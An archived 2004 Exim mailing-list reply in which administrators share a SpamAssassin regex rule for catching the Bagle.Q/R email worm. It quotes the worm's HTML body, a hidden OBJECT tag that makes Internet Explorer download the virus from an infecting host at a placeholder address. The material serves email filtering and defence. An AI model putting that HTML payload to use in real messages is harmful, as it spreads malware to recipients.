Re: [Exim] More windows viruses

Página superior
Eliminar este mensaje
Responder a este mensaje
Autor: Dennis Davis
Fecha:  
A: exim-users
Asunto: Re: [Exim] More windows viruses
>From: Tim Jackson <lists@???>
>To: exim-users@???
>Subject: Re: [Exim] More windows viruses
>Date: Thu, 18 Mar 2004 17:50:02 +0000
>
>Hi Nigel, on Thu, 18 Mar 2004 17:35:59 +0000 you wrote:
>
>[Bagle Q/R]
>> I'd be interested if anyone has a exiscan acl rule that kills this off
>> with a high degree of certainty since theres bound to be a pile of these
>> around soon.
>
>No, but I've had the following rule in my bogus-virus-warnings SpamAssasin
>ruleset since earlier today; I guess you could drop the regex into the
>DATA ACL equally well:
>
>rawbody VIRUS_WARNING_BAGLE3    /^<OBJECT STYLE="display:none"
>DATA="http:\/\/[0-9\.]+:81\/[0-9]+\.php">$/
>describe VIRUS_WARNING_BAGLE3   Looks like Bagle.R virus/bounce
>score VIRUS_WARNING_BAGLE3      10


A message that arrived on the UK security mailing list earlier today
included:


The virus itself is not sent as an attachment, but is instead
downloaded from the infecting machine exploiting a vulnerability
in Internet Explorer. The contents of the email are:

<html><body>
<font face="System">
<OBJECT STYLE="display:none" DATA="http://a.b.c.d/123456.php">
</OBJECT></body></html>

So I guess a slight mod to Tim's regex should do the trick.